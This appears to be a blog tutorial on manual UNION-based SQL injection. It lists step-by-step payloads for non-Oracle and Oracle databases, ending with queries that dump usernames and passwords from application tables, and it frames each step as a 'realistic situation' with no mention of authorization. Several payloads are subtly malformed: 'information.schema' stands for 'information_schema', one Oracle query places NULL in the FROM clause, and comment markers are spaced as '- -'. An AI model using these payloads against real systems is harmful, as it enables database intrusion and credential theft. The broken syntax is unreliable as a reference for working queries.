SQL Injection on non oracle and oracle databases manually
We have all seen in my blog how to use sqlmap to exploit vulnerabilities in web-applications and databases. Today, we will learn how to manually exploit SQL injection on non oracle and oracle databases. Security enthusiasts who want to learn sql injection will find this blog helpful.
- Realistic Situation: You are given a web application which is connected to database and you have to exploit the database using sql injection. The goal here is to get the database contents of a non oracle database.
The first step is to find the number of columns of the database. The payload to find the number of columns is : UNION SELECT NULL,NULL- -
Here we are trying to find the the number of columns and we are assuming there are two since we have used Null twice. If there were 3 columns then we would have used Null thrice.
The second step is to find the data type of columns. Both the coulmns are of data type text here which means string. The payload is : UNION SELECT ‘abc’, ‘def’- -
Next we try to find the version of database. Since it is non oracle database then we will use the following payload: UNION SELECT version(), NULL- -
Next we will try to find out the table-names in the database. We will use the following payloads: UNION SELECT table_name, NULL FROM information.schema.tables- -
Next we will try to output the column names of the table. UNION SELECT column_name, NULL FROM information.schema.columns WHERE table_name= ‘name of table’- -
Finally, we will output the usernames and passwords using the following payload: UNION SELECT username, password FROM table_name(actual name of table)- -
2. Realistic Situation: You are given a web application which is connected to database and you have to exploit the database using sql injection. The goal here is to get the database contents of a oracle database.
Firstly, we will find the number of columns with the following payload:
UNION SELECT NULL,NULL from dual- -
Next, we need to find the datatype of the columns with the following payload: UNION SELECT ‘abc’, ‘def’ from dual- -
Next, we need to find the version of the database with the payload: UNION SELECT banner FROM v$version,NULL- -
Next, we will try to find the list of tables in the database with the following payload: UNION SELECT table_name, NULL FROM all_tables- -
Next, we will find the column names of the table with the following payloads: UNION SELECT column_name, NULL FROM all_tab_columns WHERE table_name = ‘actual name of table’- -
Finally, we will output the username and password using the following payload: UNION SELECT username ,password FROM table_name(actual name of table)
Thanks for reading this, smash the like buttons and see you guys in the next one. Peace✌🏽